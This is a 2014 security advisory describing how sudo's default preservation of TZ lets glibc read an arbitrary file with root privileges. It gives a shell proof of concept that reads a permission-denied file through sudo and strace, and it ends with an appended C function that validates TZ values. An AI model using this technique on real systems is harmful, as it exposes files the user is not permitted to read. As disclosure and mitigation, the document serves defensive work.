Abusing TZ for fun (and little profit)

Published: 2014.10.17
Credit: Jakub Wilk
Risk: Low
CWE: N/A
CVE: N/A
Local: Yes
Remote: No

By default, sudo preserves the TZ variable[1] from the user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program into reading an arbitrary file. PoC:


$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096) = 4
read(3, "", 4096) = 0
Wed Oct 15 20:42:42 2014
+++ exited with 0 +++


Procmail is another program that recklessly whitelists TZ[2].


[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13

--
Jakub Wilk
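
One way a privileged wrapper could vet TZ before passing it on, shown as an added example (not part of the original post and not sudo's or procmail's code). The function name tz_is_safe and the ZONEINFO_DIR path are assumptions made for illustration.

```c
#include <ctype.h>
#include <limits.h>
#include <stdbool.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Assumption: system zoneinfo directory; the location varies by distribution. */
#define ZONEINFO_DIR "/usr/share/zoneinfo"

/*
 * Hypothetical helper: return true if a user-supplied TZ value may be
 * preserved for a privileged process, false if it should be dropped.
 */
bool tz_is_safe(const char *tz)
{
    if (tz == NULL)
        return false;

    /* glibc accepts an optional leading ':' before a file name. */
    if (*tz == ':')
        tz++;

    if (strlen(tz) >= PATH_MAX)
        return false;

    /* An absolute path is acceptable only below the zoneinfo directory. */
    if (*tz == '/') {
        size_t dlen = strlen(ZONEINFO_DIR);
        if (strncmp(tz, ZONEINFO_DIR, dlen) != 0 || tz[dlen] != '/')
            return false;
    }

    char prev = '/';
    for (const char *p = tz; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        /* Reject whitespace and non-printable bytes. */
        if (isspace(c) || !isprint(c))
            return false;
        /* Reject ".." path elements, which could escape the zoneinfo tree. */
        if (prev == '/' && c == '.' && p[1] == '.' &&
            (p[2] == '/' || p[2] == '\0'))
            return false;
        prev = (char)c;
    }
    return true;
}
```

With this check, the PoC's TZ=$PWD/tz value is rejected, while zone names such as Europe/Warsaw and POSIX-style rule strings pass.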
